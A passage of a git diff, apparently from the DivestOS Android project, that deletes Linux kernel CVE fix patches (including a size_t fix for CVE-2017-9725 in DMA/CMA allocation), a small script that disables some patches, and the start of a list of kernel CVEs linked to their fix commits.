-+	err |= put_user(NULL, &data->vaddr);
- 	err |= put_user(u, (compat_uptr_t *)&data->vaddr);
- 	err |= get_user(l, &data32->offset);
- 	err |= put_user(l, &data->offset);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9725/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-9725/3.10/0001.patch
deleted file mode 100644
index d34ee8d6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9725/3.10/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From 5479a3c164c8762b5bf91c5fae452882366adb6a Mon Sep 17 00:00:00 2001
-From: Maggie White <maggiewhite@google.com>
-Date: Wed, 5 Jul 2017 16:47:15 -0700
-Subject: mm: Fix incorrect type conversion for size during dma allocation
-
-This was found during userspace fuzzing test when a large size
-allocation is made from ion
-
-[<ffffffc00008a098>] show_stack+0x10/0x1c
-[<ffffffc00119c390>] dump_stack+0x74/0xc8
-[<ffffffc00020d9a0>] kasan_report_error+0x2b0/0x408
-[<ffffffc00020dbd4>] kasan_report+0x34/0x40
-[<ffffffc00020cfec>] __asan_storeN+0x15c/0x168
-[<ffffffc00020d228>] memset+0x20/0x44
-[<ffffffc00009b730>] __dma_alloc_coherent+0x114/0x18c
-[<ffffffc00009c6e8>] __dma_alloc_noncoherent+0xbc/0x19c
-[<ffffffc000c2b3e0>] ion_cma_allocate+0x178/0x2f0
-[<ffffffc000c2b750>] ion_secure_cma_allocate+0xdc/0x190
-[<ffffffc000c250dc>] ion_alloc+0x264/0xb88
-[<ffffffc000c25e94>] ion_ioctl+0x1f4/0x480
-[<ffffffc00022f650>] do_vfs_ioctl+0x67c/0x764
-[<ffffffc00022f790>] SyS_ioctl+0x58/0x8c
-
-Bug: 38195738
-Signed-off-by: Rohit Vaswani <rvaswani@codeaurora.org>
-Signed-off-by: Maggie White <maggiewhite@google.com>
-Change-Id: I6b1a0a3eaec10500cd4e73290efad4023bc83da5
----
- drivers/base/dma-contiguous.c  | 4 ++--
- include/linux/dma-contiguous.h | 4 ++--
- 2 files changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/base/dma-contiguous.c b/drivers/base/dma-contiguous.c
-index f6e779e..9313bfc1 100644
---- a/drivers/base/dma-contiguous.c
-+++ b/drivers/base/dma-contiguous.c
-@@ -589,7 +589,7 @@ static void clear_cma_bitmap(struct cma *cma, unsigned long pfn, int count)
-  * global one. Requires architecture specific get_dev_cma_area() helper
-  * function.
-  */
--unsigned long dma_alloc_from_contiguous(struct device *dev, int count,
-+unsigned long dma_alloc_from_contiguous(struct device *dev, size_t count,
- 				       unsigned int align)
- {
- 	unsigned long mask, pfn = 0, pageno, start = 0;
-@@ -604,7 +604,7 @@ unsigned long dma_alloc_from_contiguous(struct device *dev, int count,
- 	if (align > CONFIG_CMA_ALIGNMENT)
- 		align = CONFIG_CMA_ALIGNMENT;
- 
--	pr_debug("%s(cma %p, count %d, align %d)\n", __func__, (void *)cma,
-+	pr_debug("%s(cma %p, count %zu, align %d)\n", __func__, (void *)cma,
- 		 count, align);
- 
- 	if (!count)
-diff --git a/include/linux/dma-contiguous.h b/include/linux/dma-contiguous.h
-index 9e6fee9..d8d124e 100644
---- a/include/linux/dma-contiguous.h
-+++ b/include/linux/dma-contiguous.h
-@@ -117,7 +117,7 @@ static inline int dma_declare_contiguous_reserved(struct device *dev,
- 	return ret;
- }
- 
--unsigned long dma_alloc_from_contiguous(struct device *dev, int count,
-+unsigned long dma_alloc_from_contiguous(struct device *dev, size_t count,
- 				       unsigned int order);
- bool dma_release_from_contiguous(struct device *dev, unsigned long pfn,
- 				 int count);
-@@ -136,7 +136,7 @@ int dma_declare_contiguous(struct device *dev, phys_addr_t size,
- }
- 
- static inline
--unsigned long dma_alloc_from_contiguous(struct device *dev, int count,
-+unsigned long dma_alloc_from_contiguous(struct device *dev, size_t count,
- 				       unsigned int order)
- {
- 	return 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9725/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-9725/4.4/0002.patch
deleted file mode 100644
index 4b363ca8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9725/4.4/0002.patch
+++ /dev/null
@@ -1,105 +0,0 @@
-From 1f8f9b566e8446c13b954220c226c58d22076f88 Mon Sep 17 00:00:00 2001
-From: Rohit Vaswani <rvaswani@codeaurora.org>
-Date: Thu, 17 Sep 2015 17:28:13 -0700
-Subject: mm: Fix incorrect type conversion for size during dma allocation
-
-This was found during userspace fuzzing test when a large size
-allocation is made from ion
-
-[<ffffffc00008a098>] show_stack+0x10/0x1c
-[<ffffffc00119c390>] dump_stack+0x74/0xc8
-[<ffffffc00020d9a0>] kasan_report_error+0x2b0/0x408
-[<ffffffc00020dbd4>] kasan_report+0x34/0x40
-[<ffffffc00020cfec>] __asan_storeN+0x15c/0x168
-[<ffffffc00020d228>] memset+0x20/0x44
-[<ffffffc00009b730>] __dma_alloc_coherent+0x114/0x18c
-[<ffffffc00009c6e8>] __dma_alloc_noncoherent+0xbc/0x19c
-[<ffffffc000c2b3e0>] ion_cma_allocate+0x178/0x2f0
-[<ffffffc000c2b750>] ion_secure_cma_allocate+0xdc/0x190
-[<ffffffc000c250dc>] ion_alloc+0x264/0xb88
-[<ffffffc000c25e94>] ion_ioctl+0x1f4/0x480
-[<ffffffc00022f650>] do_vfs_ioctl+0x67c/0x764
-[<ffffffc00022f790>] SyS_ioctl+0x58/0x8c
-
-Change-Id: Idc9c19977a8cc62c7d092f689d30368704b400bc
-Signed-off-by: Rohit Vaswani <rvaswani@codeaurora.org>
----
- drivers/base/dma-contiguous.c  | 2 +-
- include/linux/cma.h            | 3 ++-
- include/linux/dma-contiguous.h | 4 ++--
- mm/cma.c                       | 4 ++--
- 4 files changed, 7 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/base/dma-contiguous.c b/drivers/base/dma-contiguous.c
-index 950fff9..a12ff98 100644
---- a/drivers/base/dma-contiguous.c
-+++ b/drivers/base/dma-contiguous.c
-@@ -187,7 +187,7 @@ int __init dma_contiguous_reserve_area(phys_addr_t size, phys_addr_t base,
-  * global one. Requires architecture specific dev_get_cma_area() helper
-  * function.
-  */
--struct page *dma_alloc_from_contiguous(struct device *dev, int count,
-+struct page *dma_alloc_from_contiguous(struct device *dev, size_t count,
- 				       unsigned int align)
- {
- 	if (align > CONFIG_CMA_ALIGNMENT)
-diff --git a/include/linux/cma.h b/include/linux/cma.h
-index a93438b..a76f8df 100644
---- a/include/linux/cma.h
-+++ b/include/linux/cma.h
-@@ -25,6 +25,7 @@ extern int __init cma_declare_contiguous(phys_addr_t base,
- extern int cma_init_reserved_mem(phys_addr_t base,
- 					phys_addr_t size, int order_per_bit,
- 					struct cma **res_cma);
--extern struct page *cma_alloc(struct cma *cma, int count, unsigned int align);
-+extern struct page *cma_alloc(struct cma *cma, size_t count,
-+				unsigned int align);
- extern bool cma_release(struct cma *cma, struct page *pages, int count);
- #endif
-diff --git a/include/linux/dma-contiguous.h b/include/linux/dma-contiguous.h
-index 569bbd0..fec734d 100644
---- a/include/linux/dma-contiguous.h
-+++ b/include/linux/dma-contiguous.h
-@@ -111,7 +111,7 @@ static inline int dma_declare_contiguous(struct device *dev, phys_addr_t size,
- 	return ret;
- }
- 
--struct page *dma_alloc_from_contiguous(struct device *dev, int count,
-+struct page *dma_alloc_from_contiguous(struct device *dev, size_t count,
- 				       unsigned int order);
- bool dma_release_from_contiguous(struct device *dev, struct page *pages,
- 				 int count);
-@@ -144,7 +144,7 @@ int dma_declare_contiguous(struct device *dev, phys_addr_t size,
- }
- 
- static inline
--struct page *dma_alloc_from_contiguous(struct device *dev, int count,
-+struct page *dma_alloc_from_contiguous(struct device *dev, size_t count,
- 				       unsigned int order)
- {
- 	return NULL;
-diff --git a/mm/cma.c b/mm/cma.c
-index 8e9ec13..6343f77 100644
---- a/mm/cma.c
-+++ b/mm/cma.c
-@@ -338,7 +338,7 @@ err:
-  * This function allocates part of contiguous memory on specific
-  * contiguous memory area.
-  */
--struct page *cma_alloc(struct cma *cma, int count, unsigned int align)
-+struct page *cma_alloc(struct cma *cma, size_t count, unsigned int align)
- {
- 	unsigned long mask, pfn, start = 0;
- 	unsigned long bitmap_maxno, bitmap_no, bitmap_count;
-@@ -348,7 +348,7 @@ struct page *cma_alloc(struct cma *cma, int count, unsigned int align)
- 	if (!cma || !cma->count)
- 		return NULL;
- 
--	pr_debug("%s(cma %p, count %d, align %d)\n", __func__, (void *)cma,
-+	pr_debug("%s(cma %p, count %zu, align %d)\n", __func__, (void *)cma,
- 		 count, align);
- 
- 	if (!count)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/Fix.sh b/Patches/Linux_CVEs/Fix.sh
deleted file mode 100644
index 33fecde8..00000000
--- a/Patches/Linux_CVEs/Fix.sh
+++ /dev/null
@@ -1,27 +0,0 @@
-#!/bin/bash
-#DivestOS: A privacy oriented Android distribution
-#Copyright (c) 2017 Spot Communications, Inc.
-#
-#This program is free software: you can redistribute it and/or modify
-#it under the terms of the GNU General Public License as published by
-#the Free Software Foundation, either version 3 of the License, or
-#(at your option) any later version.
-#
-#This program is distributed in the hope that it will be useful,
-#but WITHOUT ANY WARRANTY; without even the implied warranty of
-#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-#GNU General Public License for more details.
-#
-#You should have received a copy of the GNU General Public License
-#along with this program.  If not, see <https://www.gnu.org/licenses/>.
-
-mv CVE-2017-0794/ANY/0001.patch CVE-2017-0794/ANY/0001.patch.disabled
-mv CVE-2016-0819/ANY/0001.patch CVE-2016-0819/ANY/0001.patch.disabled
-mv CVE-2017-16USB/ANY/0007.patch CVE-2017-16USB/ANY/0007.patch.disabled
-
-#mv CVE-2016-0819/ANY/0.patch CVE-2016-0819/ANY/0.patch.disabled
-#mv CVE-2016-0774/ANY/0.patch CVE-2016-0774/ANY/0.patch.disabled
-#mv CVE-2016-8399/ANY/0.patch CVE-2016-8399/ANY/0.patch.disabled
-#mv CVE-2016-6741/3.10/0.patch CVE-2016-6741/3.10/0.patch.disabled
-#mv CVE-2014-0196/ANY/0.patch CVE-2014-0196/ANY/0.patch.disabled
-#mv CVE-2015-2922/ANY/0.patch CVE-2015-2922/ANY/0.patch.disabled
diff --git a/Patches/Linux_CVEs/Kernel_CVE_Patch_List.txt b/Patches/Linux_CVEs/Kernel_CVE_Patch_List.txt
deleted file mode 100644
index c07fd9e3..00000000
--- a/Patches/Linux_CVEs/Kernel_CVE_Patch_List.txt
+++ /dev/null
@@ -1,1973 +0,0 @@
-#Last checked 2017-11-25
-#This is a combined list from the following sources
-#	https://source.android.com/security/bulletin
-#	https://source.android.com/security/advisory
-#	https://cve.lineageos.org/api/v1/cves
-#	https://www.codeaurora.org/security-advisories
-#	https://www.codeaurora.org/security-advisories/security-bulletins
-#	https://github.com/google/syzkaller/blob/master/docs/linux/found_bugs_usb.md
-#	+ some extras
-#To Do
-#	Make another pass through LineageOS CVE tracker for more patch versions
-#To add
-#	https://github.com/google/syzkaller/blob/master/docs/linux/found_bugs.md
-#	https://www.codeaurora.org/security-advisory/uncontrolled-memory-mapping-in-camera-driver-cve-2013-2595
-#	https://www.codeaurora.org/security-advisory/multiple-issues-in-camera-drivers-cve-2014-9410-cve-2015-0568
-#	https://portland.source.codeaurora.org/patches/quic/la/
-#The 'Untracked' folder contains patches from the following sources
-#	https://portland.source.codeaurora.org/patches/quic/la/CVE-fixes-patches.zip
-CVE-2012-4220
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=32682d16fb46a60a7952c4d9e0653602ff674e4b
-CVE-2012-4221
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=32682d16fb46a60a7952c4d9e0653602ff674e4b
-CVE-2012-4222
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=1e76f61bb001b93795a227f8f808104b6c10b048
-CVE-2012-6657
-	Link - ^3.5 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e10986d1d698140747fcfc2761ec9cb64c1d582
-CVE-2012-6689
-	Link - ^3.5 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=20e1db19db5d6b9e4e83021595eab0dc8f107bef
-CVE-2012-6701
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a70b52ec1aaeaf60f4739edb1b422827cb6f3893
-CVE-2012-6701
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a70b52ec1aaeaf60f4739edb1b422827cb6f3893
-CVE-2012-6703
-	Depends
-	Link - https://github.com/torvalds/linux/commit/b35cc8225845112a616e3a2266d2fde5ab13d3ab
-	Link - https://github.com/torvalds/linux/commit/4dc040a0b34890d2adc0d63da6e9bfb4eb791b19
-CVE-2012-6704
-	Link - ^3.5 - https://github.com/torvalds/linux/commit/82981930125abfd39d7c8378a9cfdf5e1be2002b
-CVE-2013-2015
-	Link - ^3.8 - https://github.com/android/kernel_common/commit/016a3592cc34fa349235b5a8b48af5cece2cbfeb
-CVE-2013-2596
-	Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=24b51892b863ad23a9fcb2a28a45e5cc15c2f3b5
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=7e9785f78415d32e0b17b1d296a172b66e0d2ab7
-	Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=cdde1a87792a52274763eb006d326ca254ec3c63
-CVE-2013-2597
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=abd0d7da5cab6057dba752486e347b9d568e5f58
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=76fb3e419e2b149292c3adf1e9171e2b542831bf
-CVE-2013-4312
-	Depends
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=a5a6cf8c405e826ff7ed1308dde72560c0ed4854
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=5ea820046ee399214221c0bb817eb35d304c9604
-	Link - 4.5 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=712f4aad406bb1ed67f3f98d04c044191f0ff593
-	Link - 4.5 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=415e3d3e90ce9e18727e8843ae343eda5a58fad6
-CVE-2013-4736
-	Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=fab0bc54f4b70fd1d85300731822379a487d66ca5
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=8c5300aec8cd9882b89e9d169680221541da0d7f
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=81947189009afcfac17d1106101260c660421265
-CVE-2013-4737
-	Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=4256415b296348ff16cd17a5b8f8dce4dea37328
-CVE-2013-4738
-	Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=c9c81836ee44db9974007d34cf2aaeb1a51a8d45
-	Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=28385b9c3054c91dca1aa194ffa750550c50f3c
-CVE-2013-4739
-	Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=8604847927f952cc8e773b97eca24e1060a570f2
-CVE-2013-4740
-	Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=f53bcf29a6e7a66b3d935b8d562fa00829261f05
-CVE-2013-6122
-	Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=f53bcf29a6e7a66b3d935b8d562fa00829261f05
-CVE-2013-6123
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=7beb04ea945a7178e61d935918d3cb152996b558
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=60e4af06161d91d5aeaa04c7d6e9f4345a6acdd4
-CVE-2013-6282
-	Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=76565e3d786bed66f247c682bd9f591098522483
-CVE-2013-7446
-	Link - ^4.3 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/net/unix/af_unix.c?id=7d267278a9ece963d77eefec61630223fce08c6c
-	Link - ^4.3 - https://github.com/aosp-mirror/kernel_msm/commit/8a292b04183e82d59721ab0893e4216010aa3db9
-	Link - ^4.3 - https://github.com/aosp-mirror/kernel_msm/commit/5bed19c9f463f9078063363779548c50aea271a0
-CVE-2014-0196
-	Link - https://github.com/torvalds/linux/commit/4291086b1f081b869c6d79e5b7441633dc3ace00
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=1e5099713ce
-	Link - 3.4 - https://source.codeaurora.org/quic/la/kernel/msm/commit/?h=LA.BF.1.1.3_rb1.12&id=9aabfc9e7775abbbcf534cdecccc4f12ee423b27
-CVE-2014-0206
-	Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=d36db46c2cba973557eb6138d22210c4e0cf17d6
-CVE-2014-3153
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e9c243a5a6de0be8e584c604d353412584b592f8
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=13fbca4c6ecd96ec1a1cfa2e4f2ce191fe928a5e
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=54a217887a7b658e2650c3feff22756ab80c7339
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b3eaa9fc5cd0a4d74b18f6b8dc617aeaf1873270
-CVE-2014-0972
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=7613c9d520ee4d227e635f6db0270d4cf26102bc
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=d7d07936a166e7421a6308eec443b707a9678580
-CVE-2014-0975
-	Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=832666bda9606623c3cff5b14873553f82ec1281
-CVE-2014-0976
-	Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=ee37138b8ceee6035c93756043eaac7eaa1c0948
-CVE-2014-1739
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e6a623460e5fc960ac3ee9f946d3106233fd28d8
-CVE-2014-2523
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=5b866eaa34e
-	Link - ^3.13 - https://github.com/torvalds/linux/commit/b22f5126a24b3b2f15448c3f2a254fc10cbc2b92
-CVE-2014-2706
-	Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=1d147bfa64293b2723c4fec50922168658e613ba
-CVE-2014-2851
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/patch/?id=b04c46190219a4f845e46a459e3102137b7f6cac
-CVE-2014-3145
-	Dupe
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=314760e66c35c8ffa51b4c4ca6948d207e783079
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=05ab8f2647e4221cbdb3856dd7d32bd5407316b3
-CVE-2014-4014
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=23adbe12ef7d3d4195e80800ab36b37bee28cd03
-CVE-2014-4321
-	Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=68c459daa22a26d6ca8f169baef6605ca8a285f2
-CVE-2014-4322
-	Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=b9470692c228608ef0ec60747ac2732ad7ffedf0
-	Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=e909d95e6bded328e388d5b8d123297bbbb70728
-CVE-2014-4323
-	Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=014fa8def84c62893fa016e873c12de1da498603
-CVE-2014-4324
-	Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=8ad163e831a2b2c30551edb360f168a604cdb0bb
-CVE-2014-4655
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=82262a46627bebb0febcc26664746c25cef08563
-CVE-2014-4656
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=883a1d49f0d77d30012f114b2e19fc141beb3e8e
-CVE-2014-4943
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=1179c8f1cac
-	Link - ^3.15 - https://github.com/torvalds/linux/commit/3cf521f7dc87c031617fd47e4b7aa2593c2f3daf
-CVE-2014-5206
-	Link - ^3.16 - https://github.com/torvalds/linux/commit/a6138db815df5ee542d848318e5dae681590fccd
-CVE-2014-7822
-	Link - 3.2-^3.16 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=894c6350eaa
-CVE-2014-7825
-	Depends
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=6f25b4e75a8
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=8043761416d
-	Link - ^3.17 - https://github.com/torvalds/linux/commit/086ba77a6db00ed858ff07451bedee197df868c9
-CVE-2014-7970
-	Link - 3.0 - https://github.com/LineageOS/android_kernel_samsung_smdk4412/commit/c88f7bbd8026761a615c9969d186ffa2a1a3da3c
-	Link - 3.4 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=9f7d53c09a1f87ebe228b55a83c1b8f952d76260
-	Link - ^3.17 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0d0826019e529f21c84687521d03f60cd241ca7d
-CVE-2014-8160
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=d7cde286daa
-	Link - ^3.18 - https://github.com/torvalds/linux/commit/db29a9508a9246e77087c5531e45b2c88ec6988b
-CVE-2014-8173
-	Link - 3.9-^3.12 - https://github.com/torvalds/linux/commit/ee53664bda169f519ce3c6a22d378f0b946c8178
-CVE-2014-8709
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=338f977f4eb441e69bb9a46eaa0ac715c931a67f
-CVE-2014-9322
-	Depends
-	Link - https://android.googlesource.com/kernel/common/+/c22e479e335628ce8766cfbf06e2ba17e8f9a1bb
-	Link - https://android.googlesource.com/kernel/common/+/1b627d4e5e61e89b840f77abb3ca6711ad6ffbeb
-	Link - https://android.googlesource.com/kernel/common/+/4c941665c7368a34b146929b31949555e680a4ee
-	Link - https://android.googlesource.com/kernel/common/+/758f0dac9104b46016af98304656a0268ac3e105
-	Link - https://android.googlesource.com/kernel/common/+/44d057a37868a60bc2eb6e7d1dcea701f234d56a
-	Link - https://android.googlesource.com/kernel/common/+/b9b9f908c8ae82b73b9d75181982028b6bc06c2b
-	Link - https://android.googlesource.com/kernel/common/+/e068734f9e7344997a61022629b92d142a985ab3
-	Link - https://android.googlesource.com/kernel/common/+/fdc6c1052bc7d89a5826904fbb4318677e8442ce
-	Link - https://android.googlesource.com/kernel/common/+/211d59c0034ec9d88690c750ccd6da27f6952dc5
-	Link - https://android.googlesource.com/kernel/common/+/c9e31d5a4747e9967ace6d05896c78516c4c0850
-	Link - https://android.googlesource.com/kernel/common/+/e01834bfbafd25fd392bf10014451c4e5f34f829
-CVE-2014-9420
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=f54e18f1b831c92f6512d2eedb224cd63d607d3d
-CVE-2014-9529
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a3a8784454692dd72e5d5d34dcdab17b4420e74c
-CVE-2014-9683
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=f2d130454e4
-	Link - ^3.18 - https://github.com/torvalds/linux/commit/942080643bce061c3dd9d5718d3b745dcb39a8bc
-CVE-2014-9715
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=33eedfe8ecb
-	Link - ^3.14 - https://github.com/torvalds/linux/commit/223b02d923ecd7c84cf9780bb3686f455d279279
-CVE-2014-9731
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0e5cc9a40ada6046e6bc3bdfcd0c0d7e4b706b14
-CVE-2014-9777
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=17bfaf64ad503d2e6607d2d3e0956f25bf07eb43
-CVE-2014-9778
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=af85054aa6a1bcd38be2354921f2f80aef1440e5
-CVE-2014-9779
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c?h=LA.BF.1.1.3_rb1.12&id=0b5f49b360afdebf8ef55df1e48ec141b3629621
-CVE-2014-9780
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=b5bb13e1f738f90df11e0c17f843c73999a84a54
-CVE-2014-9781
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/drivers/video/?h=LA.BF.1.1.3_rb1.12&id=a2b5237ad265ec634489c8b296d870827b2a1b13&context=20&ignorews=0&dt=0
-CVE-2014-9782
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/patch/?id=2e57a46ab2ba7299d99d9cdc1382bd1e612963fb
-CVE-2014-9783
-	Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=2b1050b49a9a5f7bb57006648d145e001a3eaa8b
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=a7502f4f801bb95bff73617309835bb7a016cde5
-CVE-2014-9784
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=36503d639cedcc73880974ed92132247576e72ba
-CVE-2014-9785
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=b4338420db61f029ca6713a89c41b3a5852b20ce
-CVE-2014-9786
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/patch/?id=2fb303d9c6ca080f253b10ed9384293ca69ad32b
-CVE-2014-9787
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=528400ae4cba715f6c9ff4a2657dafd913f30b8b
-CVE-2014-9788
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=73bfc22aa70cc0b7e6709381125a0a42aa72a4f2
-CVE-2014-9789
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=5720ed5c3a786e3ba0a2428ac45da5d7ec996b4e
-CVE-2014-9790
-	Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?h=LA.BF.1.1.3_rb1.12&id=6ed921bda8cbb505e8654dfc1095185b0bccc38e
-	Link - https://source.codeaurora.org/quic/la/kernel/msm/commit?h=LA.BF.1.1.3_rb1.12&id=9bc30c0d1832f7dd5b6fa10d5e48a29025176569
-CVE-2014-9791
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?h=LA.BF.1.1.3_rb1.12&id=9aabfc9e7775abbbcf534cdecccc4f12ee423b27
-CVE-2014-9792
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=a3e3dd9fc0a2699ae053ffd3efb52cdc73ad94cd
-CVE-2014-9803
-	Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/arch/arm64/include/asm/pgtable.h?h=linux-3.10.y&id=5a0fdfada3a2aa50d7b947a2e958bf00cbe0d830
-CVE-2014-9863
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=75eac48a48562f819f50eeff8369b296d89102d7
-CVE-2014-9864
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=a1124defc680055e2f2a8c8e3da4a94ca2ec842e
-CVE-2014-9865
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=e65a876a155de945e306f2726f3a557415e6044e
-CVE-2014-9866
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=8e6daae70422ad35146a87700e6634a747d1ff5d
-CVE-2014-9867
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=322c518689a7f820165ca4c5d6b750b02ac34665
-CVE-2014-9868
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=1f274b74c00187ba1c379971503f51944148b22f
-CVE-2014-9869
-	Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=8d1f7531ff379befc129a6447642061e87562bca
-	Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=7a26934e4196b4aa61944081989189d59b108768
-CVE-2014-9870
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=4f57652fcd2dce7741f1ac6dc0417e2f265cd1de
-CVE-2014-9871
